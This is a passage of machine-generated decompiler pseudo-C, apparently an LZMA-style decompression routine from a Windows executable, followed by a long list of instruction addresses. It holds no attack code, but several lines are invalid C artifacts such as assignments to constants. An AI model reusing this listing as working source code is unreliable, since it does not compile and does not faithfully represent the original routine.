											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                                                    0x00406d0f
                                                    0x00406d0f
                                                    0x00406d0f
                                                    0x00406d0f
                                                    0x00406d15
                                                    0x00406d19
                                                    0x00406d1d
                                                    0x00406d27
                                                    0x00406d35
                                                    0x0040700b
                                                    0x0040700b
                                                    0x0040700e
                                                    0x00407015
                                                    0x00407042
                                                    0x00407042
                                                    0x00407046
                                                    0x00000000
                                                    0x00000000
                                                    0x00407048
                                                    0x00407051
                                                    0x00407057
                                                    0x0040705a
                                                    0x0040705d
                                                    0x00407060
                                                    0x00407063
                                                    0x00407069
                                                    0x00407082
                                                    0x00407085
                                                    0x00407091
                                                    0x00407092
                                                    0x00407095
                                                    0x0040706b
                                                    0x0040706b
                                                    0x0040707a
                                                    0x0040707d
                                                    0x0040707d
                                                    0x0040709f
                                                    0x0040703f
                                                    0x0040703f
                                                    0x0040703f
                                                    0x00407042
                                                    0x00407046
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004070a1
                                                    0x004070a1
                                                    0x0040701a
                                                    0x0040701e
                                                    0x00407156
                                                    0x00407156
                                                    0x00407160
                                                    0x00407168
                                                    0x0040716f
                                                    0x00407171
                                                    0x00407178
                                                    0x0040717c
                                                    0x0040717c
                                                    0x00407024
                                                    0x0040702a
                                                    0x00407031
                                                    0x00407039
                                                    0x00407039
                                                    0x0040703c
                                                    0x00000000
                                                    0x0040703c
                                                    0x004070a6
                                                    0x004070b3
                                                    0x004070b6
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x0040675e
                                                    0x0040675e
                                                    0x0040675e
                                                    0x00406767
                                                    0x00000000
                                                    0x00000000
                                                    0x0040676d
                                                    0x0040676d
                                                    0x00000000
                                                    0x00406774
                                                    0x00406778
                                                    0x00000000
                                                    0x00000000
                                                    0x0040677e
                                                    0x00406781
                                                    0x00406784
                                                    0x00406787
                                                    0x0040678b
                                                    0x00000000
                                                    0x00000000
                                                    0x00406791
                                                    0x00406791
                                                    0x00406794
                                                    0x00406796
                                                    0x00406797
                                                    0x0040679a
                                                    0x0040679c
                                                    0x0040679d
                                                    0x0040679f
                                                    0x004067a2
                                                    0x004067a7
                                                    0x004067ac
                                                    0x004067b5
                                                    0x004067c8
                                                    0x004067cb
                                                    0x004067d7
                                                    0x004067ff
                                                    0x00406801
                                                    0x0040680f
                                                    0x0040680f
                                                    0x00406813
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406803
                                                    0x00406803
                                                    0x00406806
                                                    0x00406807
                                                    0x00406807
                                                    0x00000000
                                                    0x00406803
                                                    0x004067d9
                                                    0x004067dd
                                                    0x004067e2
                                                    0x004067e2
                                                    0x004067eb
                                                    0x004067f3
                                                    0x004067f6
                                                    0x00000000
                                                    0x004067fc
                                                    0x004067fc
                                                    0x00000000
                                                    0x004067fc
                                                    0x00000000
                                                    0x00406819
                                                    0x00406819
                                                    0x0040681d
                                                    0x004070c9
                                                    0x004070c9
                                                    0x00000000
                                                    0x004070c9
                                                    0x00406823
                                                    0x00406826
                                                    0x00406836
                                                    0x00406839
                                                    0x0040683c
                                                    0x0040683c
                                                    0x0040683c
                                                    0x0040683f
                                                    0x00406843
                                                    0x00000000
                                                    0x00000000
                                                    0x00406845
                                                    0x00406845
                                                    0x0040684b
                                                    0x00406875
                                                    0x0040687b
                                                    0x00406882
                                                    0x00000000
                                                    0x00406882
                                                    0x0040684d
                                                    0x00406851
                                                    0x00406854
                                                    0x00406859
                                                    0x00406859
                                                    0x00406864
                                                    0x0040686c
                                                    0x0040686f
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004068b4
                                                    0x004068ba
                                                    0x004068bd
                                                    0x004068ca
                                                    0x004068d2
                                                    0x00000000
                                                    0x00000000
                                                    0x00406889
                                                    0x00406889
                                                    0x0040688d
                                                    0x004070d8
                                                    0x004070d8
                                                    0x00000000
                                                    0x004070d8
                                                    0x00406893
                                                    0x00406899
                                                    0x004068a4
                                                    0x004068a4
                                                    0x004068a4
                                                    0x004068a7
                                                    0x004068aa
                                                    0x004068ad
                                                    0x004068b2
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f49
                                                    0x00406f49
                                                    0x00406f4f
                                                    0x00406f55
                                                    0x00406f5b
                                                    0x00406f75
                                                    0x00406f78
                                                    0x00406f7e
                                                    0x00406f89
                                                    0x00406f89
                                                    0x00406f8b
                                                    0x00406f5d
                                                    0x00406f5d
                                                    0x00406f6c
                                                    0x00406f70
                                                    0x00406f70
                                                    0x00406f95
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f97
                                                    0x00406f9b
                                                    0x0040714a
                                                    0x0040714a
                                                    0x00000000
                                                    0x0040714a
                                                    0x00406fa1
                                                    0x00406fa7
                                                    0x00406fae
                                                    0x00406fb6
                                                    0x00406fb9
                                                    0x00406fbc
                                                    0x00406fbc
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x00000000
                                                    0x00000000
                                                    0x004068da
                                                    0x004068da
                                                    0x004068dc
                                                    0x004068df
                                                    0x00406950
                                                    0x00406950
                                                    0x00406953
                                                    0x00406956
                                                    0x0040695d
                                                    0x00406967
                                                    0x00000000
                                                    0x00406967
                                                    0x004068e1
                                                    0x004068e1
                                                    0x004068e5
                                                    0x004068e8
                                                    0x004068ea
                                                    0x004068ed
                                                    0x004068f0
                                                    0x004068f2
                                                    0x004068f5
                                                    0x004068f7
                                                    0x004068fc
                                                    0x004068ff
                                                    0x00406902
                                                    0x00406906
                                                    0x0040690d
                                                    0x00406910
                                                    0x00406917
                                                    0x0040691b
                                                    0x00406923
                                                    0x00406923
                                                    0x00406923
                                                    0x0040691d
                                                    0x0040691d
                                                    0x0040691d
                                                    0x00406912
                                                    0x00406912
                                                    0x00406912
                                                    0x00406927
                                                    0x0040692a
                                                    0x00406948
                                                    0x00406948
                                                    0x0040694a
                                                    0x00000000
                                                    0x0040692c
                                                    0x0040692c
                                                    0x0040692c
                                                    0x0040692f
                                                    0x00406932
                                                    0x00406935
                                                    0x00406937
                                                    0x00406937
                                                    0x00406937
                                                    0x0040693a
                                                    0x0040693d
                                                    0x0040693f
                                                    0x00406940
                                                    0x00406943
                                                    0x00000000
                                                    0x00406943
                                                    0x00000000
                                                    0x00406b79
                                                    0x00406b79
                                                    0x00406b7d
                                                    0x00406b9b
                                                    0x00406b9b
                                                    0x00406b9e
                                                    0x00406ba5
                                                    0x00406ba8
                                                    0x00406bab
                                                    0x00406bae
                                                    0x00406bb1
                                                    0x00406bb4
                                                    0x00406bb6
                                                    0x00406bbd
                                                    0x00406bbe
                                                    0x00406bc0
                                                    0x00406bc3
                                                    0x00406bc6
                                                    0x00406bc9
                                                    0x00406bc9
                                                    0x00406bce
                                                    0x00000000
                                                    0x00406bce
                                                    0x00406b7f
                                                    0x00406b7f
                                                    0x00406b82
                                                    0x00406b85
                                                    0x00406b8f
                                                    0x00000000
                                                    0x00000000
                                                    0x00406be3
                                                    0x00406be3
                                                    0x00406be7
                                                    0x00406c0a
                                                    0x00406c0d
                                                    0x00406c10
                                                    0x00406c1a
                                                    0x00406be9
                                                    0x00406be9
                                                    0x00406bec
                                                    0x00406bef
                                                    0x00406bf2
                                                    0x00406bff
                                                    0x00406c02
                                                    0x00406c02
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c26
                                                    0x00406c26
                                                    0x00406c2a
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c30
                                                    0x00406c30
                                                    0x00406c34
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c3a
                                                    0x00406c3a
                                                    0x00406c3c
                                                    0x00406c40
                                                    0x00406c40
                                                    0x00406c43
                                                    0x00406c47
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c97
                                                    0x00406c97
                                                    0x00406c9b
                                                    0x00406ca2
                                                    0x00406ca2
                                                    0x00406ca5
                                                    0x00406ca8
                                                    0x00406cb2
                                                    0x00000000
                                                    0x00406cb2
                                                    0x00406c9d
                                                    0x00406c9d
                                                    0x00000000
                                                    0x00000000
                                                    0x00406cbe
                                                    0x00406cbe
                                                    0x00406cc2
                                                    0x00406cc9
                                                    0x00406ccc
                                                    0x00406ccf
                                                    0x00406cc4
                                                    0x00406cc4
                                                    0x00406cc4
                                                    0x00406cd2
                                                    0x00406cd5
                                                    0x00406cd8
                                                    0x00406cd8
                                                    0x00406cdb
                                                    0x00406cde
                                                    0x00406ce1
                                                    0x00406ce1
